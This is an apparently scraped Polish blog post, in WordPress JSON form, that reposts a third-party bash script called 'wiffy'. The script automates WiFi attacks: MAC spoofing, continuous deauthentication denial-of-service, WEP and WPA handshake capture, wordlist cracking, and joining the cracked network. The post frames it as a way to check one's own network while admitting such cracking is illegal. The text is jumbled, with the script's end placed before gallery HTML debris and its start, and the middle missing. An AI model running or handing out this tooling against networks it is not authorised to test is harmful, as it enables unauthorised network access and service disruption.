macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0003.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m 